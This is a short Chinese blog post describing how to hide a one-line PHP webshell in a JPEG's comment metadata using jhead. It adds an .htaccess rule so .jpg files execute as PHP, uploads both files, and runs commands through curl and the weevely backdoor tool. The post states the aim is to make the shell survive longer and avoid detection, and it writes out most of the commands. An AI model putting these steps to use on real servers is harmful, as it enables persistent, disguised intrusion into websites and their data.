#From: Focusecurity.Org
通过jpeg图片隐藏webshell代码已经不是新鲜事了,综合之前在Exploit-db上看到的“FCKeditor all versian Arbitrary File Upload Vulnerability”一文,通过在jpeg文件中隐藏webshell代码能够大大增加其存活周期,还不容易被发现。以下是个人想法。
具体步骤
1.准备jhead和一张小的jpeg图片;(补充下:jhead工具可以修改jpeg文件的metadata内容,开源,支持多个平台运行)
2.通过jhead为jpeg图片附加一句话的webshell代码:
以下是引用片段: jhead.exe -ce test.JPG |
附加后的test.jpg如下:
以下是引用片段: File name : test.JPG |
我们可以看到在Comment中已经加入了一句话代码。
3.建立.htaccess文件并增加文件解析类型:
以下是引用片段: echo "AddType application/x-httpd-php .jpg" >> .htaccess |
4.将test.jpg文件与.htaccess文件上传,执行
以下是引用片段: curl -d cmd=id http://127.0.0.1/test.jpg |
即可执行命令了。
再进一步,我们可以通过weevely来执行命令:
以下是引用片段: weevely.py -g -o back.php -p admin |
生成一个back.php文件,密码为admin,
以下是引用片段: weevely.py -t -p admin -u http://127.0.0.1/test.jpg |
即可在本地shell执行命令.
参考
https://bechtsoudis.com/hacking/php-code-into-jpeg-metadata-from-hide-to-unhide/
--The End--
留言评论(旧系统):